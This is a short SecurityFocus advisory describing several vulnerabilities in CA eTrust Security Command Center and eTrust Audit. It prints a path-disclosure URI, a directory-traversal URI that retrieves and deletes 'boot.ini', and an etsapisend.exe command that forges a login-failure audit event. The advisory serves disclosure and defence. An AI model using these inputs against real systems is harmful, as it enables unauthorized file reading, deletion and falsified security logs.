CA eTrust Security Command Center and eTrust Audit Multiple Vulnerabilities

Attackers may exploit these issues using a web browser or the 'etsapisend.exe' executeable.

The following URI demonstrates the path-disclosure issue:
https://www.example.com:8080/etrust/servlet/ePPIServlet?PIProfile=eAV_Report's&PIName=Generate+Pre-7.1+Report+Data&profile= Threat+Management&node=

The following URI demonstrates the arbitrary-file-access/removal issue by retrieving 'boot.ini' and then deleting it:
https://www.example.com:8080/etrust/servlet/eSMPAuditServlet?verb=getadhochtml&eSCCAdHocHtmlFile=../../../../../../../boot.ini

The following command-line example will send a login-failure event:
etsapisend.exe -nod $dstIP -cat "System Access" -opr Logon -sta F -nam NT-Security -loc \\Domain\IIS_Server -usr System -evt 70 -src Security -nid 529 -inf "Logon Failure"


 

Privacy Statement
Copyright 2010, SecurityFocus